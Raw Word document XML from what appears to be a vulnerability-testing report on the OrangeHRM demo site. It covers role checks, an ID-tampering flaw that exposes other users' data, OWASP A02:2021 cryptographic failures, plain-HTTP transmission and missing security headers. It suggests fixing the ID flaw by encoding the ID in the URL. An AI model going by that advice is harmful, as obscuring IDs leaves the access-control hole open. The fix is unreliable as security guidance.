            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Racf1879d56524e60">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449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="1EACC9C7" w14:textId="52A1CE40">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="54738102" w14:textId="3AF151B6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="295CE02B" w:rsidP="449E37A7" w:rsidRDefault="295CE02B" w14:paraId="4B70E527" w14:textId="28896E64">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="295CE02B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Prevent </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="295CE02B" w:rsidP="449E37A7" w:rsidRDefault="295CE02B" w14:paraId="3F96141E" w14:textId="65B9D53A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="295CE02B">
        <w:rPr/>
        <w:t xml:space="preserve">Checking the user roles on the base page whether the user can be able to view the page if </w:t>
      </w:r>
      <w:r w:rsidR="12BF1991">
        <w:rPr/>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidR="295CE02B">
        <w:rPr/>
        <w:t xml:space="preserve"> access the page navigating to 401 </w:t>
      </w:r>
      <w:r w:rsidR="645F3A05">
        <w:rPr/>
        <w:t xml:space="preserve">page </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="295CE02B" w:rsidP="449E37A7" w:rsidRDefault="295CE02B" w14:paraId="582D1771" w14:textId="620BDE4C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="295CE02B">
        <w:drawing>
          <wp:inline wp14:editId="27461FC3" wp14:anchorId="299D974F">
            <wp:extent cx="4572000" cy="2343150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1193909486" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R8f6bccb188c84ccf">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449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="20F3B8AB" w14:textId="534FC3E1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2892C117" w:rsidP="449E37A7" w:rsidRDefault="2892C117" w14:paraId="4EABCC0C" w14:textId="6EBCAF10">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="2892C117">
        <w:rPr/>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2892C117" w:rsidP="449E37A7" w:rsidRDefault="2892C117" w14:paraId="6D739CD3" w14:textId="32EDBFE2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="2892C117">
        <w:drawing>
          <wp:inline wp14:editId="45CC0AFE" wp14:anchorId="6E7D0B69">
            <wp:extent cx="4572000" cy="2076450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1724531117" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R2c5de9dd6556479a">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449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="5AD84328" w14:textId="04BB34B9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56E1674B" w:rsidP="449E37A7" w:rsidRDefault="56E1674B" w14:paraId="5C300B62" w14:textId="20885962">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="56E1674B">
        <w:drawing>
          <wp:inline wp14:editId="6C294F4F" wp14:anchorId="03EC76F1">
            <wp:extent cx="4572000" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58211365" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rf7a398af232145d0">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449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="0396D94E" w14:textId="08B5FCDD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56E1674B" w:rsidP="449E37A7" w:rsidRDefault="56E1674B" w14:paraId="7F3E1ED0" w14:textId="37762A6F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="56E1674B">
        <w:rPr/>
        <w:t>0431</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="1223B0E2" w14:textId="0D061785">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2294263E" w:rsidP="449E37A7" w:rsidRDefault="2294263E" w14:paraId="570B5A24" w14:textId="02337315">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:hyperlink r:id="Rb24fe1db1ecf449d">
        <w:r w:rsidRPr="449E37A7" w:rsidR="2294263E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://opensource-demo.orangehrmlive.com/web/index.php/pim/viewPersonalDetails/empNumber/275</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="70A751C9" w14:textId="2DBF5B41">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6C10FA18" w:rsidP="449E37A7" w:rsidRDefault="6C10FA18" w14:paraId="2C1A600B" w14:textId="4092F892">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="6C10FA18">
        <w:drawing>
          <wp:inline wp14:editId="460BC02F" wp14:anchorId="2E436914">
            <wp:extent cx="4572000" cy="2228850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1532670742" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rd9fb829657e54767">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449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="615B99FC" w14:textId="03E6EA24">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6C10FA18" w:rsidP="449E37A7" w:rsidRDefault="6C10FA18" w14:paraId="4BC153CD" w14:textId="2C24DA17">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="6C10FA18">
        <w:drawing>
          <wp:inline wp14:editId="7FFDC0FE" wp14:anchorId="58AFB6F9">
            <wp:extent cx="4572000" cy="2295525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="247778951" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rb09162bf14c542b0">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6C10FA18" w:rsidP="449E37A7" w:rsidRDefault="6C10FA18" w14:paraId="376451E5" w14:textId="397AD611">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="6C10FA18">
        <w:drawing>
          <wp:inline wp14:editId="4F6BAD7C" wp14:anchorId="6B764361">
            <wp:extent cx="4572000" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62181267" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R4f820d8daeb8482c">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="6C10FA18" w:rsidP="449E37A7" w:rsidRDefault="6C10FA18" w14:paraId="42F66123" w14:textId="4F733F29">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="6C10FA18">
        <w:rPr/>
        <w:t xml:space="preserve">Changing the ID getting another user data </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6C10FA18" w:rsidP="449E37A7" w:rsidRDefault="6C10FA18" w14:paraId="62B6BE31" w14:textId="120898C6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="6C10FA18">
        <w:drawing>
          <wp:inline wp14:editId="1541862F" wp14:anchorId="7551D5D2">
            <wp:extent cx="4572000" cy="2324100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1122138662" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rf6ccd3ebe0454486">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09BF0F08" w:rsidP="449E37A7" w:rsidRDefault="09BF0F08" w14:paraId="3D44307E" w14:textId="0A3ECB91">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="09BF0F08">
        <w:rPr/>
        <w:t>How to Prevent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09BF0F08" w:rsidP="449E37A7" w:rsidRDefault="09BF0F08" w14:paraId="79D30564" w14:textId="52364C03">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="09BF0F08">
        <w:rPr/>
        <w:t xml:space="preserve">Encode the ID in the URL and decode the ID in the code </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="17357E61" w14:textId="3983C985">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="3D367EEA" w14:textId="548572A9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="234E2EE3" w:rsidP="449E37A7" w:rsidRDefault="234E2EE3" w14:paraId="79D15563" w14:textId="384124B1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="234E2EE3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3FCBDEE6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3FCBDEE6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>02 :</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="234E2EE3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="234E2EE3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="234E2EE3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="234E2EE3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cryptographic</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="234E2EE3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="234E2EE3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Failures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3A65084A" w:rsidP="449E37A7" w:rsidRDefault="3A65084A" w14:paraId="77B96734" w14:textId="1CAFB350">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3A65084A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptographic failures are </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3A65084A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="040C28"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where attackers often target sensitive data, such as passwords, credit card numbers, and personal information, when you do not properly protect them</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3A65084A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This is the root cause of sensitive data exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="234E2EE3" w:rsidP="449E37A7" w:rsidRDefault="234E2EE3" w14:paraId="6E6B8B66" w14:textId="09477936">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="234E2EE3">
        <w:drawing>
          <wp:inline wp14:editId="0433BF89" wp14:anchorId="51EB83E4">
            <wp:extent cx="5710324" cy="2605336"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1846299046" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rec82200bbf8f4157">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5710324" cy="2605336"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="3B5AFD86" w14:textId="34B5DB9F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="74E59494" w14:textId="7B8C9800">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="4A6149FA" w14:textId="4F5323EA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="6B8B723D" w14:textId="4417DF5D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5135E8F9" w:rsidP="449E37A7" w:rsidRDefault="5135E8F9" w14:paraId="5714AAEA" w14:textId="0E6BA5E8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="5135E8F9">
        <w:rPr/>
        <w:t xml:space="preserve"> Sending data to Hypertext </w:t>
      </w:r>
      <w:r w:rsidR="5135E8F9">
        <w:rPr/>
        <w:t>protocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5135E8F9" w:rsidP="449E37A7" w:rsidRDefault="5135E8F9" w14:paraId="54A4D36F" w14:textId="6B752757">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="5135E8F9">
        <w:drawing>
          <wp:inline wp14:editId="5486D790" wp14:anchorId="24657A11">
            <wp:extent cx="4572000" cy="2295525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="735108156" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R8de876a3a8844ef7">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449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="03517793" w14:textId="7A2BCDBB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="29C7CC08" w14:textId="5BB21B57">
      <w:pPr>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pP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 xml:space="preserve">The recommended HTTP security headers you mentioned serve various purposes to enhance the security of web applications. If these headers are missing or not properly configured, it can expose your web application to potential security risks. </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Here's</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 xml:space="preserve"> a brief overview of the consequences of missing each header:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05BE9DDA" w:rsidP="449E37A7" w:rsidRDefault="05BE9DDA" w14:paraId="37B8FA2A" w14:textId="7E14CECC">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0F0F0F"/>
